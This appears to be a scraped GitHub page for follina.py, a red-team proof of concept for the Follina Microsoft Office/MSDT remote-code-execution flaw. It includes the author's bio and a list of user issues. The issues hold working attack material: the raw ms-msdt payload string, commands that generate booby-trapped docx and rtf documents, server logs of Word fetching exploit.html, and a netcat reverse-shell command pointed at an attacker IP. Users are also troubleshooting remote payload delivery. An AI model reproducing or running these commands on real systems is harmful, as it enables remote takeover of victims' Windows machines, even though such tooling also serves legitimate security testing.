follina.py's Introduction

Cas van Cooten (@chvancooten)

Hey 👋! My name is Cas, I'm a Red Teamer based in the Netherlands. In my free time, I like to build offensive security tooling (OST), specifically in the Nim programming language. In the interest of transparency and to support the community in becoming better at offense and defense alike, I also like to publish my projects publicly as open-source software in a responsible manner (a much-debated point, I know).

Feel free to reach out if you have any questions about offensive development, red teaming, or other security topics! Always happy to chat.



follina.py's People

Contributors

aidenmitchell, chvancooten, danusminimus, mosajjal

follina.py's Issues

word+exp not work? I need help

I'm going to run this directly in Win+R

ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"

I can open calc, but using Word with exp shows that exp is loaded but MSDT is not executed.

501 unsupported method

C:\Users\shaun\Desktop\follina.py>follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo whoami > c:\users\shaun\Desktop\follina.py\owned.txt'"
Generated 'clickme.docx' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://localhost:80/exploit.html
127.0.0.1 - - [30/May/2022 21:21:53] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:53] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:53] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:53] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:53] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] "GET /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] "GET /exploit.html HTTP/1.1" 304 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:56] "HEAD /exploit.html HTTP/1.1" 200 -

Getting this message when attempting to replicate.

Using a remote binary

Hello,

I'm trying to test the remote version of the exploit in a more realistic setting, i.e. I'm actually uploading an executable to a web server and trying to specify the URL with the -u switch. But I get an error that says that I have to specify the executable:

$ python follina.py -t docx -m binary -u https://www.example.com/my_payload.exe
Binary mode requires a binary to be specified, e.g. -b '\\localhost\c$\Windows\System32\calc.exe'

My understanding is that by supplying a URL the script should generate an exploit that tries to retrieve the executable from the web server instead of searching locally. Am I getting this wrong?

Listen for errors after the document is run

I am using the latest version today, and the document starts to report an error as soon as it runs. It seems that the http.server has not been successfully started?

Manually created http.server service can receive requests, but cannot go online cs :(

From the log, there is no request to access payloadps1. Which step am I doing wrong? 🤔

Word Version

My server receives the connections; the exploit doesn't seem to work with the latest Word version 2205 though. Got it working with older ones.

MSDT PASS KEY

Hello,

When I try to execute the .doc file, it contacts my server to download exploit.html but nothing happens.
What's more, when I reach exploit.html directly, it opens MSDT but with a passkey prompt and nothing happens....

I use Open Office 2019 and Windows 10. Do you have an idea about this issue? I tried on Windows 11 too.

Thank you.

why???

The first attack can succeed and then fail. It's strange

The path for called binary

Hi,
First of all, thank you for this PoC. The right usage should be as follows for the path of the binary.
python3 follina.py -m binary -b \\windows\\system32\\calc.exe -u <IP>
or
python3 follina.py -m binary -b calc.exe -u <IP>
Specifying it with a single backslash causes the specified binary not to be found. This can be seen in the following screenshot.

Capture

Thank you again

Binary not opened in Windows 11

I have disabled Windows Defender Security and launched the command:
python .\follina.py -t docx -m binary -b C:\Windows\System32\calc.exe

When I launch the docx I can perfectly see the GET requests from Word Office but the calc.exe doesn't open.
Obviously I have checked that I can manually open the calculator application.

What do you think the problem is?
Thanks in advance.

Windows Defender Removing Generated Files

Windows Defender on Windows 8.1 (and perhaps above) will remove some generated files, creating an OSError [ERRNO 22]. To fix this, simply turn off Windows Defender.

-u doesn't seem to do anything

Hi there, I'm hoping to use this script to generate a Word document that gets the payload from a remote URL.

As mentioned in the docs, you can use -u to specify a URL, but it doesn't seem to do anything, the generated document still tries to reach out to localhost.

RTF url issue

Hey,
so I was playing around with this POC and I was trying to get a .rtf to pull the .html from a VM that wasn't the one executing the maldoc.
So I tried using the -u option but I noticed that it was still contacting http://localhost:80/exploit.html, even when the local server didn't even start.
To solve the issue I tried to mess with the rtf template and I noticed that there were 2 http://localhost:80/exploit.html instances, one generated by the {payload_url} in the py code and one hardcoded (to find it: ctrl + f > http://lo).
The weird thing is that even by changing both urls to the ip I was trying to contact the .rtf still performed GET requests to localhost.
Am I missing something obvious here?

Steps to reproduce the issue:

  1. python .\follina.py -t rtf -m command -c "Start-Process cmd.exe" -u https://google.com
  2. python .\follina.py -t docx -m command -c "Start-Process cmd.exe"
  3. open the .rtf
    A GET request will be logged and cmd.exe will start even tho I doubt that google is hosting exploit.html lol

Unneeded Argument For SimpleHTTPServer

For my version of python (3.6 I believe), the simple http server doesn’t take a directory argument and this needs to be removed and the HTML file put into the main directory as that is where the simple http server will serve files from.

Adding content

Is there a way to add content to the docx/rtf file? Because after I've opened the file, added some content and saved it, it stopped working.

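Looking for a command that can pop a shell

python .\follina.py -t docx -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c c:\windows\system32\nc.exe -e cmd 192.168.25.148 5555'" -H 192.168.25.148 -P 8080
I tried this, with nc listening on the attacking machine, and then opened the Word document on the target machine. Port 8080 on the attacking machine received data, but port 5555 did not get the nc reverse shell.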

FileNotFoundError

Traceback (most recent call last):
File "C:\TEMP\follina.py", line 23, in
with open("src/document.xml.rels.tpl", "r") as f:
FileNotFoundError: [Errno 2] No such file or directory: 'src/document.xml.rels.tpl'

Am I missing something beyond the python3 .\follina.py needed to execute this?
